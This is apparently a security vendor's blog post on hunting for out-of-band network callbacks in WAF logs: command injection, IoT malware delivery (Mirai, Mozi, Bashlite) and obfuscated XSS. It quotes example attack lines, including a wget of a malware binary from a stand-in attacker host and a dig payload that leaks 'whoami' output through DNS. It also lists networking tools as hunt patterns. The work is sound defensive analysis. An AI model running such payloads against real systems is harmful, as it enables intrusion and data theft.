Threat hunting network callbacks in WAF data
Threat hunting is the practice of looking for active attackers who have possibly penetrated security boundaries within an organization. It requires a mixed set of skills across data analysis, security, networking, and, most importantly, a heavy dose of curiosity. In this post, we describe real-life examples of hunts our team performs using data from the Fastly Next-Gen WAF (powered by Signal Sciences). These examples are intended to spark ideas of how you could threat hunt using your WAF's data.
Overview
As part of standard tradecraft, attackers will often use static and dynamic application security testing techniques to gain information that helps them achieve their operational goals. If they are unable to get direct feedback about whether a particular attack is working, they may move into using out-of-band techniques.
Out-of-band application security testing requires the usage of network callbacks (making the target application reach back out to the attacker) to receive confirmation that a blind attack payload was successful. Malicious attackers use the same technique to load and execute malware by first confirming they can execute a callback and then grabbing the malicious file. Frequently, these callbacks will hit a mix of domains and specific IP addresses.
Armed with this knowledge, defenders can study network callbacks, either attempted or successful. This can be supplemented by event logs if they have good vantage points and the right logging enabled in their infrastructure.
WAF logs
The first thing needed for any hunt is data. In this case, we are focused on WAF logs that have been aggregated based on alerts of potential malice. If you’re taking a look at your own logs, just remember that they need to be collected and aggregated in a centralized data store (i.e., a SIEM or other repository).
If you’re a Fastly Next-Gen WAF customer, searching through a site’s request feed is an excellent source for this data. You can search by filtering on tags, in particular the tag object fields type
and value
.
Finding proverbial needles in haystacks
In the overview, we mentioned that for this particular threat hunt we searched for network-based callbacks in attack logs. We specifically looked at command injection and execution attempts which would then perform a network callback. We isolated the results by looking for references to common networking tools, such as curl
, dig
, netcat
, nslookup
, or wget
; for example, wget http://attacker.example.com/bins/mirai.arm7
.
For this type of attack to be successful, the attacker must execute something that already exists within the target environment. Using common system binaries is sometimes described as “living off the land” binaries or LOLbins for short. For a more comprehensive search, you can use LOLBin lists such as LOLBAS and GTFOBins, which focus on Windows and Unix respectively.
By extracting these attack attempts in our environment, we identified some commonality among these attacks. To better understand them, we extracted a subset of the command line arguments following each LOLbin in the log entry, then looked for commonality in the arguments by aggregating and counting. This allowed us to extract domains and IP addresses from common attacks to obtain more context about them with information from other data sources.
After performing our initial analysis,we started asking questions like:
Are attackers using common security tool domains? – e.g. burpcollaborator.net, interact.sh
Is the technology they’re attempting to exploit even relevant to the environment? – e.g. attempted Windows command execution in a Linux environment or vice versa
Are they attempting to use multiple IP addresses that have other attributes in common? – e.g. Mozi botnet using a common URI path with different IPs
Is the attacker callback server still live? Can we grab the payload from it?
When threat hunting, it’s valuable to answer questions like these to gain insight into the attacker’s objectives. After all, the possible next steps an attacker could take might seem infinite, so understanding their motivation can provide insight into which path is most likely.
Sometimes even the data itself might glean the motivation, such as when bug bounty participants include a special X-header referencing their username on a bug bounty platform or use the username as a subdomain in the callback URI.
Security Tools
Security tools are prevalent throughout our data. For the time period of our analysis, we found that approximately 3.6% of all command injection attempts contained a network callback. Of those, 85% are targeting known security tool domains.
Vendor/Tool | Domain(s) | % of CMDEXE w/callback |
---|---|---|
Project Discovery | interact.sh | 57.77% |
Netsparker | r87.me | 19.33% |
Burp Suite | burpcollaborator.net | 7.20% |
Pentest-Tools.com | pentest-tools.com | 0.85% |
Appcheck NG | ptst.io | 0.16% |
Acunetix | bxss.me | 0.10% |
Total | 85.41% |
This is not to say that malicious actors don’t use the same tools as penetration testers, but these requests are typically probes to determine whether an attack is working, not an attempt to pull hosted malware.
However, these domains cannot be ignored because attackers may attempt to exfiltrate data over DNS or HTTP (e.g. leak an environment variable as a DNS subdomain) or use the toolset as reconnaissance for the next stage of an attack. A more concrete example of this type of command injection payload is && dig `whoami`.c8qt8wk2vtc0000816hggrm7rqcyyyyyb.interact.sh
and a result as seen by an attacker.
IoT malware
In other cases, we’ve found that the attacker was trying to deploy IoT malware. In some attempted attacks, the callback is designed to pull a shell script and execute it. We found these attempts to be associated with Bashlite (a.k.a. Gafgyt) malware binaries.
The script is designed to pull the malware binary and try to execute it. It exhaustively tries all of its supported architectures, including those that are popular in IoT devices (e.g. MIPS, Motorola 68K).
Mozi malware is another IoT malware family that is easy to identify in WAF logs because it consistently uses the path /Mozi.m
or /Mozi.a
. A previously observed example of this is the URL http://183.188.6[.]132:50359/Mozi.m which delivered the Mozi malware with the hash 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef.
The clear commonality in each of these examples comes from what we sought to hunt: network callbacks.
To mitigate network callbacks, preventing the initial payload from being successful is a clear recommendation, and attacks we successfully blocked for our customers created the visibility used to perform this hunt. However, another layer of defense would be to set up strict egress filtering and use an egress proxy/gateway for applications that do need to communicate outbound. This will give you a good vantage point to monitor and some peace of mind that you can prevent network callbacks in the future.
Network Callbacks in XSS
Command injection is not the only attack type where out-of-band techniques are useful. Cross-site scripting (XSS) attacks also leverage them. However, the major difference is that the attack is targeting the application’s users rather than the application or server where it runs.
One example we uncovered during our investigation was a campaign that used a Javascript obfuscator in an attempt to evade detections. At this point, we were focused on searching for Javascript used in XSS attacks and identifying its purpose. During this search, payloads that have something as simple as an alert() are easy to identify, but others look like nothing more than random strings of characters. These can be obfuscation methods that hide the real purpose of the code.
A WAF can detect and mitigate XSS but generally does not understand anything about the underlying obfuscated content. To inspect this content, we created a Linux container for NodeJS with non-root user permissions and no network access. We then carefully executed Javascript snippets, avoiding function calls such as eval
where possible to get a sense for what the code was meant to do.
As we can see in the deobfuscated code (on the right side of the screenshot above), it is designed to call back to the domain and evaluate whatever comes back in the response. This can change over time to whatever the attacker server responds with, but when cross-checking this domain in third-party providers it was flagged as a known source of Javascript malware.
A second example was attempting to use case mismatch on its script tags and loads from a third-party resource. We’ve formatted the source of the response for clarity in the screenshot below.
The response from this domain was designed to inject an image tag into the DOM for the purpose of stealing user cookies. We notified the infrastructure provider where the campaign was being hosted so they could remove the threat.
Why do all of this?
Threat hunting insights can help organizations prioritize the active threats they should focus on defending against. Data from real attacks hitting your organization’s network serves as evidence of what is or isn’t effective currently in your security program. It can kickstart discussions around vulnerability management priorities, incident response playbooks, and improvements to operational monitoring and observability.